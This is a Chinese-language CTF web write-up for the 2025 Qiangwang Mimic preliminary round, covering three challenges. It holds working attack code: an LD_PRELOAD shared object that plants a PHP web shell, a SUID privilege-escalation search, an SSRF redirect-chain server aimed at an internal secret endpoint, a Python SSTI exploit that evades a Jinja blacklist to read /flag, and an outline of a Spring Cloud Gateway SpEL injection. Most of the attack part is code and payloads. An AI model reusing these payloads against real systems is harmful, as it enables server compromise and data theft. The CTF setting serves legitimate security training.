强网拟态2025初赛 Web Writeup
Contents
smallcode
<?php
// Echo this script's own source into the response.
highlight_file(__FILE__);
// When a `context` POST field is present, base64-decode it and write the
// decoded bytes to 1.txt (relative path).
if(isset($_POST['context'])){
$context = $_POST['context'];
file_put_contents("1.txt",base64_decode($context));
}
// When an `env` POST field is present, hand it to putenv() unmodified.
if(isset($_POST['env'])){
$env = $_POST['env'];
putenv($env);
}
system("nohup wget --content-disposition -N hhhh &");
思路:env 参数可控,可以通过 putenv 设置 LD_PRELOAD,让 system() 拉起的子进程加载我们上传的恶意 so。先编写 so 源码并编译:
#include <stdlib.h>
#include <unistd.h>
__attribute__ ((__constructor__)) void init(void){
// 防止递归加载
unsetenv("LD_PRELOAD");
system("printf \"<?php if(isset(\\$_POST['cmd'])){system(\\$_POST['cmd']);} ?>\" > /var/www/html/shell.php");
}
将编译好的 so 文件内容做 base64 编码后,通过 context 参数上传(服务端解码后写入 1.txt)

加载
env=LD_PRELOAD=/var/www/html/1.txt
这样会在 /var/www/html 下写入 shell.php,但读取 flag 还需要提权
find / -perm -u=s -type f 2>/dev/null
nl /flag
safesecret
from flask import Flask, request, jsonify, Response, abort, render_template_string, session
import requests, re
from urllib.parse import urljoin, urlparse
app = Flask(__name__)
# Upper bound on how many requests my_fetch() issues while following hops.
MAX_TOTAL_STEPS = 30
# Hop count (len(history) - 1) at or above which /fetch returns the raw
# upstream body when the final response fails validation.
ERROR_COUNT = 6
# Matches <meta http-equiv="refresh" content="N; url=..."> and captures the
# URL part (case-insensitive).
META_REFRESH_RE = re.compile(
r'<meta\s+http-equiv=["\']refresh["\']\s+content=["\']\s*\d+\s*;\s*url=([^"\']+)["\']',
re.IGNORECASE
)
def read(f):
    """Return the full text content of the file at path *f*.

    The file is opened in text mode with the default encoding and is closed
    deterministically before returning, instead of leaving the handle for the
    garbage collector.
    """
    with open(f) as handle:
        return handle.read()
# Loaded once at import time from /secret; surrounding whitespace is stripped.
SECRET = read("/secret").strip()
# NOTE(review): hard-coded session signing key; looks like a placeholder, so
# confirm it is intentional.
app.secret_key = "a_test_secret"
def sset(key, value):
    """Store *value* under *key* in the Flask session.

    Returns an empty string so that calling it from a template prints
    nothing.
    """
    session[key] = value
    nothing = ""
    return nothing
def sget(key, default=None):
    """Look up *key* in the Flask session, falling back to *default*."""
    stored = session.get(key, default)
    return stored
# Register sget and sset as Jinja globals so templates rendered by this app
# can call them directly.
app.jinja_env.globals.update(sget=sget)
app.jinja_env.globals.update(sset=sset)
@app.route("/_internal/secret")
def internal_flag():
    """Return the secret to loopback clients; abort with 403 for anyone else."""
    loopback_addrs = ("127.0.0.1", "::1")
    if request.remote_addr not in loopback_addrs:
        abort(403)
    # The payload is plain text even though the declared mimetype is JSON.
    return Response(f'OK Secret: {SECRET}', mimetype="application/json")
@app.route("/")
def index():
    """Landing page: respond with a fixed greeting."""
    greeting = "welcome"
    return greeting
def _next_by_refresh_header(r, current_url):
    """Resolve the next hop from a ``Refresh: <n>; url=<target>`` header.

    Args:
        r: response object exposing a ``headers`` mapping.
        current_url: URL the response came from; relative targets are
            resolved against it.

    Returns:
        The absolute next URL, or ``None`` when the header is absent, has no
        ``;`` / ``=`` separator, or its key is not ``url``.
    """
    header = r.headers.get("Refresh")
    if not header:
        return None
    # Everything after the first ';' is expected to look like "url=<target>".
    _, semicolon, directive = header.partition(";")
    if not semicolon:
        return None
    name, equals, target = directive.partition("=")
    if not equals or name.strip().lower() != "url":
        return None
    try:
        return urljoin(current_url, target.strip())
    except Exception:
        return None
def _next_by_meta_refresh(r, current_url):
    """Resolve the next hop from an HTML ``<meta http-equiv="refresh">`` tag.

    Only the first 5000 characters of the body are scanned. Returns the
    absolute next URL, or ``None`` when no such tag is found.
    """
    head = r.text[:5000]
    found = META_REFRESH_RE.search(head)
    if found is None:
        return None
    return urljoin(current_url, found.group(1).strip())
def _next_by_authlike_header(r, current_url):
    """Resolve the next hop from an ``X-Next`` header on a 401/407/429 reply.

    Returns the absolute next URL, or ``None`` when the status code is not
    one of those three or the header is missing/empty.
    """
    if r.status_code not in (401, 407, 429):
        return None
    hint = r.headers.get("X-Next")
    return urljoin(current_url, hint) if hint else None
def my_fetch(url):
    """Fetch *url* and keep following application-level "next" hints.

    HTTP redirects are not followed (``allow_redirects=False``). After each
    response the next URL is looked up, in this order, from the ``Refresh``
    header, an HTML meta-refresh tag, and an ``X-Next`` header on
    401/407/429 replies. The walk stops at the first response that yields no
    next URL, or after ``MAX_TOTAL_STEPS`` requests.

    Args:
        url: the first URL to request.

    Returns:
        A ``(history, last_resp, error)`` tuple. ``history`` holds one dict
        per request made (url, status, headers, first 800 chars of body).
        On a request failure ``last_resp`` is ``None`` and ``error`` is a
        message; otherwise ``error`` is ``None``.
    """
    resolvers = (
        _next_by_refresh_header,
        _next_by_meta_refresh,
        _next_by_authlike_header,
    )
    history = []
    last_resp = None
    current_url = url
    # Named `http` so it does not shadow Flask's `session`; the context
    # manager releases pooled connections when the walk ends.
    with requests.Session() as http:
        for _ in range(MAX_TOTAL_STEPS):
            try:
                r = http.get(current_url, allow_redirects=False, timeout=5)
            except Exception as e:
                return history, None, f"Upstream request failed: {e}"
            last_resp = r
            history.append({
                "url": current_url,
                "status": r.status_code,
                "headers": dict(r.headers),
                "body_preview": r.text[:800],
            })
            # First resolver that produces a URL wins; later ones are skipped.
            nxt = None
            for resolve in resolvers:
                nxt = resolve(r, current_url)
                if nxt:
                    break
            if not nxt:
                break
            current_url = nxt
    return history, last_resp, None
@app.route("/fetch")
def fetch():
    """Fetch the ``url`` query parameter via my_fetch() and validate the result.

    Responses:
        400 ``{"error": "no url"}`` when ``url`` is missing or empty.
        502 when my_fetch() reports an error or produced no response.
        200 ``{"ok": true, "len": N}`` when the final response validates:
            a JSON content type must parse as JSON, anything else must
            contain ``MUST_HAVE_FIELD``.
        500 when validation fails: the first 5000 characters of the upstream
            body as text/plain if at least ``ERROR_COUNT`` hops were walked,
            otherwise ``{"error": "Invalid JSON"}``.
    """
    target = request.args.get("url")
    if not target:
        return jsonify({"error": "no url"}), 400
    history, last_resp, err = my_fetch(target)
    if err:
        return jsonify({"error": err}), 502
    # Compare against None explicitly: requests.Response is falsy for any
    # 4xx/5xx status, which would be misreported as "no response".
    if last_resp is None:
        return jsonify({"error": "no response"}), 502
    walked_steps = len(history) - 1
    try:
        content_type = (last_resp.headers.get("Content-Type") or "").lower()
        if "application/json" in content_type:
            last_resp.json()
        elif "MUST_HAVE_FIELD" not in last_resp.text:
            raise ValueError("JSON schema mismatch")
    except Exception:
        if walked_steps >= ERROR_COUNT:
            return Response(last_resp.text[:5000], mimetype="text/plain", status=500)
        return jsonify({"error": "Invalid JSON"}), 500
    return jsonify({"ok": True, "len": len(last_resp.text)})
@app.route("/login")
def login():
    """Greet ``username`` once the caller has presented the right ``secret``.

    Responses:
        403 ``forbidden`` when ``secret`` differs from SECRET, or when the
            lower-cased username contains a blacklisted substring.
        400 when ``username`` is missing or longer than 47 characters.
        200 with the rendered greeting otherwise; the username is also
            stored in the session.
    """
    username = request.args.get("username")
    secret = request.args.get("secret", "")
    blacklist = ["config", "_", "read", "{{"]
    if secret != SECRET:
        return ("forbidden", 403)
    # A missing parameter used to reach len(None) and surface as a 500.
    if username is None:
        return ("username required", 400)
    if len(username) > 47:
        return ("username too long", 400)
    lowered = username.lower()
    if any(term in lowered for term in blacklist):
        return ("forbidden", 403)
    sset('username', username)
    # NOTE(security): the username is concatenated into the template source,
    # so it is evaluated as Jinja (template injection). Left unchanged; the
    # safe form passes it as a template variable instead.
    return render_template_string("Welcome: " + username)
if __name__ == "__main__":
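app.run(host="0.0.0.0", port=5000)
/fetch 只有在 walked_steps = len(history) - 1 ≥ ERROR_COUNT(6)时才会把上游响应原文回显出来,因此至少需要 6 次跳转;下面的 Exp 一共跳转 7 次,最后一跳指向本地的 /_internal/secret。
让 AI 写个 Exp,放到 VPS 上: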
from http.server import HTTPServer, BaseHTTPRequestHandler
class RefreshRedirectHandler(BaseHTTPRequestHandler):
    """Serve a fixed chain of ``Refresh``-header hops.

    Each known path answers 200 with a ``Refresh: 0; url=<next>`` header;
    any other path answers 404.
    """

    # path -> (Refresh target, response body)
    _HOPS = {
        '/start': ('/step1', b'Redirecting...'),
        '/step1': ('/step2', b'Redirecting...'),
        '/step2': ('/step3', b'Redirecting...'),
        '/step3': ('/step4', b'Redirecting...'),
        '/step4': ('/step5', b'Redirecting...'),
        '/step5': ('/step6', b'Redirecting...'),
        '/step6': ('http://127.0.0.1:5000/_internal/secret', b'Final redirect...'),
    }

    def do_GET(self):
        """Answer a GET with the hop configured for the requested path."""
        print(f"Request: {self.path}")
        hop = self._HOPS.get(self.path)
        if hop is None:
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b'Not Found')
            return
        target, body = hop
        self.send_response(200)
        self.send_header('Refresh', '0; url=' + target)
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        """Print log lines to stdout instead of the default stderr output."""
        print(f"LOG: {format % args}")
if __name__ == '__main__':
server = HTTPServer(('0.0.0.0', 8000), RefreshRedirectHandler)
print('Starting Refresh header redirect server on port 8000...')
server.serve_forever()
访问 /fetch?url=http://vps:port/start 即可

拿到Secret: 1140457d-a0b5-4e6d-a423-5a676e61992a
login?secret=1140457d-a0b5-4e6d-a423-5a676e61992a&username={%print(1)%}
({{ 在黑名单里,可以用 {%print ...%} 代替。)下面就需要绕过 SSTI 的黑名单和长度限制
这里过滤了config,那么就不能用config.update,如果要打继承链的话需要一个全局字典
可以看到

我们可以通过sset设置session中的键值对,再用sget获取session的值
构造出来
sget['__globals__']['read']('/flag')
# 等价于 read('/flag'):Jinja2 中 obj['name'] 取下标失败时会回退为属性访问,所以 sget['__globals__'] 实际取到的是 sget.__globals__;再从中拿到 read 函数去读取 /flag
import requests
import re
# Base URL of the challenge instance (with trailing slash).
url = "http://web-aff0e10d2f.challenge.xctf.org.cn/"
# Value sent as the `secret` query parameter to /login.
secret_key = "1140457d-a0b5-4e6d-a423-5a676e61992a"
def exp():
    """Run the four /login requests in one session and print the result.

    The first three requests each store one string in the session via
    ``sset``; the last one combines them via ``sget``. The response body is
    printed, followed by the flag if one matches ``flag{...}``.
    """
    login_url = url + "login"
    client = requests.session()

    # Each stage carries its value in an extra query parameter that the
    # template reads back through request.args.
    stages = [
        {"username": "{%print sset('g',request.args.g)%}", "g": "__globals__"},
        {"username": "{%print sset('r',request.args.r)%}", "r": "read"},
        {"username": "{%print sset('f',request.args.f)%}", "f": "/flag"}
    ]
    for stage in stages:
        query = {"secret": secret_key}
        query.update(stage)
        client.get(login_url, params=query)

    final_query = {
        "secret": secret_key,
        "username": "{%print sget[sget('g')][sget('r')](sget('f'))%}",
    }
    result = client.get(login_url, params=final_query).text
    print(result)

    # The pattern itself requires the literal "flag{", so no separate
    # substring check is needed.
    flag_match = re.search(r"flag\{[^}]+\}", result)
    if flag_match:
        print(f"\n找到FLAG: {flag_match.group(0)}")


if __name__ == "__main__":
    exp()
ezcloud
扫目录发现有actuator接口泄露
发现是 Spring Cloud Gateway,最近刚爆出 SpEL 表达式注入漏洞
然后参考https://rce.moe/2025/09/29/CVE-2025-41243/文章里面的文件读取即可读取flag


每次设置完路由post访问refresh进行更新


将路由设置到根目录后然后访问/webjars/flag
